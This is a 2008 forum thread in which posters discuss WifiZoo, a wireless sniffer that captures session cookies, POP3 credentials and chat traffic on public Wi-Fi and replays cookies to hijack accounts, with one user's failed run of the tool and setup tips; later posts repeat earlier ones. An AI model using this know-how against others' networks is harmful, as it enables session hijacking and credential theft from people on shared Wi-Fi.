Be careful what you broadcast...

Dr. Z · 21-03-2008, 17:35

...if you are using a wifi connection in a public place (or anywhere, really)

I have been trying out this tool called WifiZoo which is like a kind of Wireshark for wireless but with a bit of a cool twist. Instead of showing you a long list of packets which you would have to walk through to get a handle on what is going on, this tracks connections and basically presents you with a categorical breakdown of useful stuff.

For example, you sit down in your hotel lobby and use their wireless LAN to check your GMail account. GMail tracks who you are and your authenticated status using cookies. You log in over SSL, so there is no chance of a MITM seeing your password, but google then issue you a cookie which says "yes, I am logged in" which has a limited expiration time. The rest of your session is then in plaintext, but without the cookie you can't get into the GMail site... WifiZoo tracks HTTP sessions and grabs any cookies set. With a click of the mouse, it injects that cookie into its own built-in proxy server and presents me with the page that only you should be able to see. Clever, huh?

Its not limited to cookies and stuff though, oh no! It can track POP3 auth details, MSN conversations, FTP data, SMTP data and thats just out of the box - if you know Python you could code it to track whatever you wanted.

When combined with a tool called KISMET it will channelhop too so you can track multiple APs at once to see which is the "best" one to pay more attention to or in multi-AP configurations you can keep track of multiple users which might not be on the same AP.

Here is a screenshot:

http://www.statichiss.co.uk/wifizoo.png

Feek · 22-03-2008, 01:29

Ouch!

Garp · 22-03-2008, 08:58

ssh tunnel from my N810 through to my server, then using mail clients like mutt on it keeps my data sensitive data encrypted all the time..thankfully

you got me curioius though.. *goes off in hunt of software*

Desmo · 22-03-2008, 10:45

I had a little play with BacktrackII a little while ago but didn't have a clue what was going on

Will · 22-03-2008, 11:10

Quote:

Originally Posted by Desmo

I had a little play with BacktrackII a little while ago but didn't have a clue what was going on

Yeah - I've installed all sorts of apps on my linux laptop - do I know what's going on? Do I ****!

Desmo · 22-03-2008, 15:40

I'm just downloading Ubuntu so I can cock things up some more

Desmo · 22-03-2008, 19:02

Was going to have a play with wifizoo but can't seem to get it working :/
I'm a nix noob!

Desmo · 22-03-2008, 19:07

Think I'm doing this right....

Code:

james@james-laptop:~$ python /home/james/wifizoo/wifizoo.py -i eth1
WifiZoo v1.3, complains to Hernan Ochoa (hernan@gmail.com)
using interface eth1
Launching Web Interface..
WifiZoo Web GUI Serving HTTP on 127.0.0.1 port 8000 ...
WifiZoo HTTP Proxy on 127.0.0.1 port 8080 ...
Waiting...
Traceback (most recent call last):
  File "/home/james/wifizoo/wifizoo.py", line 121, in <module>
    p = sniff(filter=None, iface=conf.iface, count=1)
  File "/home/james/wifizoo/scapy.py", line 11815, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
  File "/home/james/wifizoo/scapy.py", line 10133, in __init__
    self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
  File "/usr/lib/python2.5/socket.py", line 154, in __init__
    _sock = _realsocket(family, type, proto)
socket.error: (1, 'Operation not permitted')

...but I'm getting this socket error at the end.

Dr. Z · 22-03-2008, 22:29

What card do you have? You also need to be running Kismet in the background at the same time, as well as being root (tack a sudo onto the front of both this and kismet - kismet altumatically priv-drops anyways but as wifizoo is only passive you shouldn't be too much at risk

)

Quote:

Originally Posted by garp

sh tunnel from my N810 through to my server, then using mail clients like mutt on it keeps my data sensitive data encrypted all the time..thankfully

you got me curioius though.. *goes off in hunt of software*

but if I can see all your packets, whats to stop me MITMing you? (RSA fingerprints aside)

In any case, SSH is still vulnerable to offline brute-force attacks so I could, theoretically obtain your username and password if I caught your handshake

Garp · 23-03-2008, 11:21

Quote:

Originally Posted by DRZ

What card do you have? You also need to be running Kismet in the background at the same time, as well as being root (tack a sudo onto the front of both this and kismet - kismet altumatically priv-drops anyways but as wifizoo is only passive you shouldn't be too much at risk

)

but if I can see all your packets, whats to stop me MITMing you? (RSA fingerprints aside)

In any case, SSH is still vulnerable to offline brute-force attacks so I could, theoretically obtain your username and password if I caught your handshake

good luck trying to get them from an passphrase protected sshkey.

still mitm could be used to disrupt things a bit. last years hacker conference had some bloke who used mitm style hacks with snort to replace all images on pages people were viewing with goatse

21-03-2008, 17:35	#1
Dr. Z I'm going for a scuttle... Join Date: Jul 2006 Posts: 2,021	Be careful what you broadcast... ...if you are using a wifi connection in a public place (or anywhere, really) I have been trying out this tool called WifiZoo which is like a kind of Wireshark for wireless but with a bit of a cool twist. Instead of showing you a long list of packets which you would have to walk through to get a handle on what is going on, this tracks connections and basically presents you with a categorical breakdown of useful stuff. For example, you sit down in your hotel lobby and use their wireless LAN to check your GMail account. GMail tracks who you are and your authenticated status using cookies. You log in over SSL, so there is no chance of a MITM seeing your password, but google then issue you a cookie which says "yes, I am logged in" which has a limited expiration time. The rest of your session is then in plaintext, but without the cookie you can't get into the GMail site... WifiZoo tracks HTTP sessions and grabs any cookies set. With a click of the mouse, it injects that cookie into its own built-in proxy server and presents me with the page that only you should be able to see. Clever, huh? Its not limited to cookies and stuff though, oh no! It can track POP3 auth details, MSN conversations, FTP data, SMTP data and thats just out of the box - if you know Python you could code it to track whatever you wanted. When combined with a tool called KISMET it will channelhop too so you can track multiple APs at once to see which is the "best" one to pay more attention to or in multi-AP configurations you can keep track of multiple users which might not be on the same AP. Here is a screenshot: http://www.statichiss.co.uk/wifizoo.png __________________

22-03-2008, 01:29	#2
Feek ex SAS Join Date: Jun 2006 Location: JO01ou Posts: 10,062	Ouch! __________________

22-03-2008, 10:45	#4
Desmo The Last Airbender Join Date: Jun 2006 Location: Pigmopad Posts: 11,915	I had a little play with BacktrackII a little while ago but didn't have a clue what was going on __________________

22-03-2008, 15:40	#6
Desmo The Last Airbender Join Date: Jun 2006 Location: Pigmopad Posts: 11,915	I'm just downloading Ubuntu so I can cock things up some more __________________

22-03-2008, 19:02	#7
Desmo The Last Airbender Join Date: Jun 2006 Location: Pigmopad Posts: 11,915	Was going to have a play with wifizoo but can't seem to get it working :/ I'm a nix noob! __________________

22-03-2008, 08:58	#3
Garp Preparing more tumbleweed Join Date: Jun 2006 Location: Hawaii Posts: 6,038	ssh tunnel from my N810 through to my server, then using mail clients like mutt on it keeps my data sensitive data encrypted all the time..thankfully you got me curioius though.. goes off in hunt of software